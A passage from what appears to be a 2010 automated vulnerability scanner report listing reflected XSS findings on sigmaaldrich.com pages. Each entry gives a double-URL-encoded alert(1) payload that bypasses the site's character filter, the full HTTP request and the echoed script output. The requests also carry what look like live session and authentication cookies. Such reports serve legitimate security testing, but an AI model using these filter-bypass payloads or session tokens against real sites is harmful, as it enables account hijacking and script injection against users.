fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:00 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography5b7f8";alert(1)//9bb4c219a53/analytical-standards.html","E404") ;
   </script>
...[SNIP]...

1.9. http://www.sigmaaldrich.com/analytical-chromatography/analytical-standards.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-standards.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63839%2522%253balert%25281%2529%252f%252f742f80ae9ee was submitted in the REST URL parameter 2. This input was echoed as 63839";alert(1)//742f80ae9ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/63839%2522%253balert%25281%2529%252f%252f742f80ae9ee HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/63839";alert(1)//742f80ae9ee","E404") ;
   </script>
...[SNIP]...

1.10. http://www.sigmaaldrich.com/analytical-chromatography/catalog-request-form.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/catalog-request-form.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf604%2522%253balert%25281%2529%252f%252fe8aa16b1a71 was submitted in the REST URL parameter 1. This input was echoed as bf604";alert(1)//e8aa16b1a71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographybf604%2522%253balert%25281%2529%252f%252fe8aa16b1a71/catalog-request-form.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:17 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographybf604";alert(1)//e8aa16b1a71/catalog-request-form.html","E404") ;
   </script>
...[SNIP]...

1.11. http://www.sigmaaldrich.com/analytical-chromatography/catalog-request-form.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/catalog-request-form.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9aaca%2522%253balert%25281%2529%252f%252f8253fe91f2f was submitted in the REST URL parameter 2. This input was echoed as 9aaca";alert(1)//8253fe91f2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/9aaca%2522%253balert%25281%2529%252f%252f8253fe91f2f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:19 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/9aaca";alert(1)//8253fe91f2f","E404") ;
   </script>
...[SNIP]...

1.12. http://www.sigmaaldrich.com/analytical-chromatography/fluka-analytical/customware-oem.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/fluka-analytical/customware-oem.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b3d7%2522%253balert%25281%2529%252f%252f0b4b8116511 was submitted in the REST URL parameter 1. This input was echoed as 2b3d7";alert(1)//0b4b8116511 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography2b3d7%2522%253balert%25281%2529%252f%252f0b4b8116511/fluka-analytical/customware-oem.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:16 GMT
Content-Length: 28966
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography2b3d7";alert(1)//0b4b8116511/fluka-analytical/customware-oem.html","E404") ;
   </script>
...[SNIP]...

1.13. http://www.sigmaaldrich.com/analytical-chromatography/fluka-analytical/customware-oem.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/fluka-analytical/customware-oem.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64f3d%2522%253balert%25281%2529%252f%252f484e4ebf13c was submitted in the REST URL parameter 2. This input was echoed as 64f3d";alert(1)//484e4ebf13c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/fluka-analytical64f3d%2522%253balert%25281%2529%252f%252f484e4ebf13c/customware-oem.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; 